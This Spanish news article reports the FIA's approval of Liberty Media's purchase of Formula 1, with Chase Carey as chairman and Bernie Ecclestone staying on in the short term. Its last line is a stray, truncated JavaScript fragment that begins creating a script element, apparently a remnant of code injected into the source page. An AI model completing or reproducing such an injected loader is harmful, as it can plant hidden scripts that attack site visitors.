Deportes

La estadounidense Liberty es la nueva dueña de Fórmula 1

El Consejo Mundial de Automovilismo aprobó este miércoles la venta de la Fórmula 1 a la empresa estadounidense Liberty Media Corp. por 4.400 millones de dólares.

El nuevo director de la junta directiva de la máxima categoría del automovilismo será Chase Carey, un estadounidense que administró el estudio 21st Century Fox. Bernie Ecclestone, antiguo director y dueño de los derechos comerciales de la F1, permanecerá en el cargo a corto plazo bajo la nueva administración.

La FIA dijo en un comunicado que está “entusiasmada por trabajar con los nuevos dueños del Grupo Fórmula Uno para seguir desarrollando el espectáculo inigualable” que es la F1, y señaló estar satisfecha con todas las condiciones.

La compra debe concretarse antes de que comience la próxima temporada de la F1, el 26 de marzo en Melbourne.

Nueva era, misma velocidad

Liberty tiene la capacidad de realizar algunos cambios al calendario, como agregar otra carrera en EEUUU, implementar medidas de promoción y cobertura digital, inferir en el cronograma de las carreras, el diseño de los vehículos y hasta la distribución de ingresos entre los equipos.

El nuevo acuerdo, que promete acelerar a todos los seguidores de los motores más rápidos del mundo, tiene vigencia hasta 2020.

Fuente: Globovisión.

var d=document;var s=d.createElement(‘script’);